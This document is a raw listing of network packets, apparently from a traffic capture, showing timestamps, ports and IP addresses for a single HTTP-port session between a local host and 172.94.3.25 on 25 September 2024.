Sep 25, 2024 16:03:43.920854092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920881987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920895100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920955896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920967102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920986891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.968003035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998418093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998441935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998451948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998547077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998553038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998564005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998610973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998671055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998680115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998709917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998845100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998856068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998866081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998878002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998883009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998889923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998913050 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998914003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998924971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.998933077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.998935938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999008894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.999057055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999067068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999078035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999088049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.999104023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.999150038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999161005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999172926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.999227047 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.076910019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.076939106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.076958895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.076972008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.076983929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.076994896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077007055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077018023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077030897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077156067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.077389956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077429056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.077457905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077470064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077502966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.077522993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077533960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077547073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077557087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077569008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.077572107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077581882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077589035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.077616930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.077630997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077640057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.077672005 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.154958963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.154980898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.154997110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155047894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155236006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155308962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155319929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155333042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155363083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155375004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155375957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155397892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155426025 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155447006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155461073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155497074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155503988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155507088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155519962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155533075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155548096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155566931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155723095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155735016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155745029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.155762911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.155791044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.233438969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233480930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233493090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233505964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233517885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233530045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233541965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233556986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233608961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233622074 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.233664989 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.233721972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233732939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233743906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233757019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.233783960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.233805895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233817101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233829021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.233858109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.233967066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.234000921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.234164953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.243441105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.243462086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.243565083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.311453104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311470032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311489105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311502934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311513901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311527014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311537981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311551094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311583042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.311634064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.311809063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311819077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311830044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311867952 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.311930895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311944962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.311968088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.312031984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.312042952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.312052965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.312063932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.312064886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.312076092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.312084913 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.312114000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.321912050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.321997881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.322052956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.389606953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389626980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389640093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389652967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389666080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389693975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.389724016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.389833927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389844894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389856100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.389897108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.390207052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390218973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390264988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.390276909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390290022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390300989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390331030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.390362978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390399933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.390414953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390438080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390448093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390470982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.390614986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390628099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390640974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.390659094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.390682936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477407932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477444887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477463007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477489948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477507114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477523088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477534056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477534056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477540970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477556944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477572918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477587938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477591991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477591991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477607012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477622032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477643013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477643013 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477658033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477674007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477690935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.477694035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477694035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.477746964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.478147984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.478164911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.478180885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.478349924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.535687923 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.555618048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555639029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555655956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555713892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555727959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555735111 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.555742979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555757999 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.555792093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555831909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555845976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555861950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.555861950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.555923939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.555986881 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.556132078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556144953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556180000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.556195974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556209087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556222916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556248903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556269884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556281090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.556281090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.556284904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556298971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.556354046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.608899117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.633791924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633810997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633836031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633850098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633866072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633946896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633959055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633982897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633996964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.633996964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.633996964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634010077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634025097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634028912 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634040117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634073019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634073019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634232044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634244919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634269953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634280920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634299994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634377956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634399891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634413958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634427071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634430885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634430885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.634440899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.634468079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.644054890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.644073009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.644263983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.711998940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712021112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712035894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712065935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712096930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712105036 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712110043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712122917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712135077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712141037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712152004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712172031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712184906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712192059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712192059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712207079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712233067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712233067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712454081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712480068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712492943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712523937 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712523937 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712567091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712580919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712595940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712671041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712718010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712718010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:44.712722063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712737083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:44.712807894 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615293980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615310907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615330935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615353107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615362883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615395069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615402937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615408897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615411997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615417004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615473032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615478039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615494013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615504026 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615505934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615529060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615592003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615637064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615668058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615679979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615715027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615716934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615730047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615765095 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.615787983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615799904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615811110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.615837097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.655507088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.694174051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.694209099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.694224119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.694236040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.694247961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.694259882 CEST	80	49715	172.94.3.25	192.168.2.6
